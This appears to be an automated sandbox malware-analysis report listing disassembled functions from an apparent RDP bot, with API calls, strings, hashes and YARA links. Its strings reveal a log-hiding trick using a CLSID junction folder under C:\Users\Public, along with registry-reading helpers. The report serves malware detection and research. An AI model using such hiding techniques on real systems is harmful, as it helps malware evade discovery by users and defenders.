Opcode Fuzzy Hash: 2310b059fd1db1d94807d4043fe70c93fc81e218b0df7df5f885e9a005487d1a
Instruction Fuzzy Hash: 86513951F0CE07D5FA20D793A8803B91252AF97FB4F5401F3C90E462B2EF6DAA868341

Function 00007FFE1150427C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1150429C
GetLastError.KERNEL32 ref: 00007FFE115043D0

Part of subcall function 00007FFE11502700: GetModuleHandleExA.KERNEL32 ref: 00007FFE1150271E

strlen.MSVCRT ref: 00007FFE115042EE
strlen.MSVCRT ref: 00007FFE1150430A
strcat.MSVCRT ref: 00007FFE11504325
strlen.MSVCRT ref: 00007FFE1150432D
strlen.MSVCRT ref: 00007FFE11504342
fopen.MSVCRT ref: 00007FFE11504368

Strings

, xrefs: 00007FFE115043EE
log, xrefs: 00007FFE11504357
P, xrefs: 00007FFE1150445A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE115042CE, 00007FFE115042E4, 00007FFE1150431B, 00007FFE11504338, 00007FFE11504387
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE115044A7
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE115043BA
[I] (%s) -> %s, xrefs: 00007FFE1150451B
Done, xrefs: 00007FFE1150450D
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE115043E2
debug_init, xrefs: 00007FFE1150438E, 00007FFE115043B3, 00007FFE115043DB, 00007FFE115044A0, 00007FFE11504514
samctl.l, xrefs: 00007FFE1150434A
~, xrefs: 00007FFE11504455
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE11504395

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
API String ID: 3395718042-1297835036
Opcode ID: f4f29f3b456042e41e7448ec425dd3a81f0c8f3fc0a42b3d709108ae0aa0be7e
Instruction ID: 118318526d58c2c7f372fc1aa84d8bd3a81d447b2e7d515c5439786c41bb3698
Opcode Fuzzy Hash: f4f29f3b456042e41e7448ec425dd3a81f0c8f3fc0a42b3d709108ae0aa0be7e
Instruction Fuzzy Hash: 5A516050E5CF0385FB21A783A4803BC1B5EAF457B8F9410BAC90E5A6B6DF6DB895C301

Function 00007FFE11EC9F6C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11EC9F8C
GetLastError.KERNEL32 ref: 00007FFE11ECA0C0

Part of subcall function 00007FFE11EC4AC0: GetModuleHandleExA.KERNEL32 ref: 00007FFE11EC4ADE

strlen.MSVCRT ref: 00007FFE11EC9FDE
strlen.MSVCRT ref: 00007FFE11EC9FFA
strcat.MSVCRT ref: 00007FFE11ECA015
strlen.MSVCRT ref: 00007FFE11ECA01D
strlen.MSVCRT ref: 00007FFE11ECA032
fopen.MSVCRT ref: 00007FFE11ECA058

Strings

[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE11ECA197
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11ECA0AA
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE11ECA0D2
debug_init, xrefs: 00007FFE11ECA07E, 00007FFE11ECA0A3, 00007FFE11ECA0CB, 00007FFE11ECA190, 00007FFE11ECA204
Done, xrefs: 00007FFE11ECA1FD
log, xrefs: 00007FFE11ECA047
~, xrefs: 00007FFE11ECA145
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE11EC9FBE, 00007FFE11EC9FD4, 00007FFE11ECA00B, 00007FFE11ECA028, 00007FFE11ECA077
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE11ECA085
[I] (%s) -> %s, xrefs: 00007FFE11ECA20B
, xrefs: 00007FFE11ECA0DE
P, xrefs: 00007FFE11ECA14A
prgmgr.l, xrefs: 00007FFE11ECA03A

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
API String ID: 3395718042-2735303109
Opcode ID: 28aa5a620a821618e9e1eab76ce42311eeb29bae9038448bb8e226e1b3100159
Instruction ID: 4aa0a46e6677fea29cdc8b815fb9d63845e619baee1eb55223f49ed9619553fd
Opcode Fuzzy Hash: 28aa5a620a821618e9e1eab76ce42311eeb29bae9038448bb8e226e1b3100159
Instruction Fuzzy Hash: 4E512B50E0CE8381FB2197E7AC813BB165CAF857E4FD411B6D90E472B2EE6DB9468341

Function 00007FFE11BD5192 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE11BD51EC
RegQueryValueExA.ADVAPI32 ref: 00007FFE11BD5334

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

registry_get_value, xrefs: 00007FFE11BD5207, 00007FFE11BD5260, 00007FFE11BD5293, 00007FFE11BD52C6, 00007FFE11BD52F9, 00007FFE11BD535B, 00007FFE11BD54A6, 00007FFE11BD5624
(root != NULL), xrefs: 00007FFE11BD5259
, xrefs: 00007FFE11BD5377
(value_sz != NULL), xrefs: 00007FFE11BD52F2
, xrefs: 00007FFE11BD536E
P, xrefs: 00007FFE11BD53DF
(key != NULL), xrefs: 00007FFE11BD528C
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE11BD5252, 00007FFE11BD5285, 00007FFE11BD52B8, 00007FFE11BD52EB
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11BD562B
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE11BD520E
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE11BD5362
(value != NULL), xrefs: 00007FFE11BD52BF
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11BD54AD
P, xrefs: 00007FFE11BD53E8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11BD5267, 00007FFE11BD529A, 00007FFE11BD52CD, 00007FFE11BD5300
NULL, xrefs: 00007FFE11BD538E, 00007FFE11BD563C, 00007FFE11BD5648

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 435f0e7a9ab592d34743d64c01d9f013227a1ed4134e646b68ad534058a57e85
Instruction ID: e047fe73b5de9057a938616ecf7129f51b9079715c1e03c904f6626582c6100e
Opcode Fuzzy Hash: 435f0e7a9ab592d34743d64c01d9f013227a1ed4134e646b68ad534058a57e85
Instruction Fuzzy Hash: 9AA15360A0DF47C1FF789F02A440FF92668AF0076DE5420B2D91E466B5EE6DE985C742

Function 00007FFE1A4FBA62 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1A4FBABC
RegQueryValueExA.ADVAPI32 ref: 00007FFE1A4FBC04

Part of subcall function 00007FFE1A4F1352: fwrite.MSVCRT ref: 00007FFE1A4F13FE
Part of subcall function 00007FFE1A4F1352: fflush.MSVCRT ref: 00007FFE1A4F140A

Strings

(key != NULL), xrefs: 00007FFE1A4FBB5C
(root != NULL), xrefs: 00007FFE1A4FBB29
, xrefs: 00007FFE1A4FBC47
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A4FBD7D
NULL, xrefs: 00007FFE1A4FBC5E, 00007FFE1A4FBF0C, 00007FFE1A4FBF18
(value_sz != NULL), xrefs: 00007FFE1A4FBBC2
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1A4FBC32
registry_get_value, xrefs: 00007FFE1A4FBAD7, 00007FFE1A4FBB30, 00007FFE1A4FBB63, 00007FFE1A4FBB96, 00007FFE1A4FBBC9, 00007FFE1A4FBC2B, 00007FFE1A4FBD76, 00007FFE1A4FBEF4
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1A4FBB22, 00007FFE1A4FBB55, 00007FFE1A4FBB88, 00007FFE1A4FBBBB
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1A4FBADE
P, xrefs: 00007FFE1A4FBCB8
P, xrefs: 00007FFE1A4FBCAF
, xrefs: 00007FFE1A4FBC3E
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A4FBB37, 00007FFE1A4FBB6A, 00007FFE1A4FBB9D, 00007FFE1A4FBBD0
(value != NULL), xrefs: 00007FFE1A4FBB8F
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1A4FBEFB

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: b18f92a94391334b5021cc5a55a8855e150f120a01a416b053650ed8708d6e22
Instruction ID: e060e8dda9d49340cab6081fdd8b5e8b9eaed876cc8892fbb95d3a863c118f3c
Opcode Fuzzy Hash: b18f92a94391334b5021cc5a55a8855e150f120a01a416b053650ed8708d6e22
Instruction Fuzzy Hash: 8FA18650B0DF4B89F660970AA9403F92150AF02F76F5421F3DA5E0A6B5EE6DED96C303

Function 00007FFE126E9AD2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE126E9B2C
RegQueryValueExA.ADVAPI32 ref: 00007FFE126E9C74

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

Strings

(value != NULL), xrefs: 00007FFE126E9BFF
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126E9DED
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE126E9F6B
registry_get_value, xrefs: 00007FFE126E9B47, 00007FFE126E9BA0, 00007FFE126E9BD3, 00007FFE126E9C06, 00007FFE126E9C39, 00007FFE126E9C9B, 00007FFE126E9DE6, 00007FFE126E9F64
, xrefs: 00007FFE126E9CB7
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE126E9CA2
NULL, xrefs: 00007FFE126E9CCE, 00007FFE126E9F7C, 00007FFE126E9F88
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE126E9B4E
, xrefs: 00007FFE126E9CAE
P, xrefs: 00007FFE126E9D28
(root != NULL), xrefs: 00007FFE126E9B99
P, xrefs: 00007FFE126E9D1F
(key != NULL), xrefs: 00007FFE126E9BCC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126E9BA7, 00007FFE126E9BDA, 00007FFE126E9C0D, 00007FFE126E9C40
(value_sz != NULL), xrefs: 00007FFE126E9C32
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE126E9B92, 00007FFE126E9BC5, 00007FFE126E9BF8, 00007FFE126E9C2B

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: f0780e4458a1f16a4b0ae7c97537e6a3c9984223036dfcaa3b70bce945f15d85
Instruction ID: 2b2d24ca67427b61bf3edd6790616c241fcdd63901799263c6f42f1cf9859b42
Opcode Fuzzy Hash: f0780e4458a1f16a4b0ae7c97537e6a3c9984223036dfcaa3b70bce945f15d85
Instruction Fuzzy Hash: 60A15A6190EF4B81FB60EB02AD103BC6251EF40764F5401B2DA1E06AF5EEEDB985C346

Function 00007FFE1A52D3F2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1A52D44C
RegQueryValueExA.ADVAPI32 ref: 00007FFE1A52D594

Part of subcall function 00007FFE1A5277A2: fwrite.MSVCRT ref: 00007FFE1A52784E
Part of subcall function 00007FFE1A5277A2: fflush.MSVCRT ref: 00007FFE1A52785A

Strings

(root != NULL), xrefs: 00007FFE1A52D4B9
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1A52D5C2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A52D4C7, 00007FFE1A52D4FA, 00007FFE1A52D52D, 00007FFE1A52D560
(value_sz != NULL), xrefs: 00007FFE1A52D552
NULL, xrefs: 00007FFE1A52D5EE, 00007FFE1A52D89C, 00007FFE1A52D8A8
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1A52D46E
, xrefs: 00007FFE1A52D5D7
(value != NULL), xrefs: 00007FFE1A52D51F
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1A52D4B2, 00007FFE1A52D4E5, 00007FFE1A52D518, 00007FFE1A52D54B
(key != NULL), xrefs: 00007FFE1A52D4EC
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1A52D88B
P, xrefs: 00007FFE1A52D648
P, xrefs: 00007FFE1A52D63F
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1A52D70D
, xrefs: 00007FFE1A52D5CE
registry_get_value, xrefs: 00007FFE1A52D467, 00007FFE1A52D4C0, 00007FFE1A52D4F3, 00007FFE1A52D526, 00007FFE1A52D559, 00007FFE1A52D5BB, 00007FFE1A52D706, 00007FFE1A52D884

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 52dd1e0f452b0a0a32c6dee82c88d7773d124347f03f581defefe5ba7e31293b
Instruction ID: 9ab6b663ea93ee1ec43e5af97f8a8d957e6d017055d67726d12c4c4fc41cf364
Opcode Fuzzy Hash: 52dd1e0f452b0a0a32c6dee82c88d7773d124347f03f581defefe5ba7e31293b
Instruction Fuzzy Hash: 20A15363B0CF4BC5FA209B83A4407792252AF43F64F5400F3D95E466B1EEADB949D742

Function 00007FFE11503402 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1150345C
RegQueryValueExA.ADVAPI32 ref: 00007FFE115035A4

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

Strings

registry_get_value, xrefs: 00007FFE11503477, 00007FFE115034D0, 00007FFE11503503, 00007FFE11503536, 00007FFE11503569, 00007FFE115035CB, 00007FFE11503716, 00007FFE11503894
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150371D
P, xrefs: 00007FFE1150364F
NULL, xrefs: 00007FFE115035FE, 00007FFE115038AC, 00007FFE115038B8
(root != NULL), xrefs: 00007FFE115034C9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115034D7, 00007FFE1150350A, 00007FFE1150353D, 00007FFE11503570
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE115034C2, 00007FFE115034F5, 00007FFE11503528, 00007FFE1150355B
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE115035D2
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150389B
(key != NULL), xrefs: 00007FFE115034FC
(value != NULL), xrefs: 00007FFE1150352F
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150347E
, xrefs: 00007FFE115035DE
P, xrefs: 00007FFE11503658
, xrefs: 00007FFE115035E7
(value_sz != NULL), xrefs: 00007FFE11503562

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 6424f46c56584493deaf114f494463b6ad5cd0a7efb3682d434f95ee5198ee13
Instruction ID: 68dbefb7494ca62704a83dcd72184fc2277537b0ea539140d1d0e698ce86b5dc
Opcode Fuzzy Hash: 6424f46c56584493deaf114f494463b6ad5cd0a7efb3682d434f95ee5198ee13
Instruction Fuzzy Hash: D3A15464D1CF0B99F7B19B92A84037E265D6F01368F5401BAC91E077B2EEADE985C302

Function 00007FFE11EC3382 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE11EC33DC
RegQueryValueExA.ADVAPI32 ref: 00007FFE11EC3524

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE11EC33FE
, xrefs: 00007FFE11EC3567
(root != NULL), xrefs: 00007FFE11EC3449
, xrefs: 00007FFE11EC355E
(key != NULL), xrefs: 00007FFE11EC347C
P, xrefs: 00007FFE11EC35D8
P, xrefs: 00007FFE11EC35CF
(value_sz != NULL), xrefs: 00007FFE11EC34E2
(value != NULL), xrefs: 00007FFE11EC34AF
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE11EC3442, 00007FFE11EC3475, 00007FFE11EC34A8, 00007FFE11EC34DB
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC369D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC3457, 00007FFE11EC348A, 00007FFE11EC34BD, 00007FFE11EC34F0
registry_get_value, xrefs: 00007FFE11EC33F7, 00007FFE11EC3450, 00007FFE11EC3483, 00007FFE11EC34B6, 00007FFE11EC34E9, 00007FFE11EC354B, 00007FFE11EC3696, 00007FFE11EC3814
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE11EC3552
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11EC381B
NULL, xrefs: 00007FFE11EC357E, 00007FFE11EC382C, 00007FFE11EC3838

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 7f19a7410ae59509b384c64feabfbea1f96e87a3bd380099ac3d5f47d3dae185
Instruction ID: 4d1fef247f26db6a57c20efbb0b68aee9de68f6d512ea7a0d2b93bd471fa6f2d
Opcode Fuzzy Hash: 7f19a7410ae59509b384c64feabfbea1f96e87a3bd380099ac3d5f47d3dae185
Instruction Fuzzy Hash: DAA13F65D0CF4B91FB20DBC2AC003BB625CAF14764F9451B2CA1E467B1EE6DFA858702

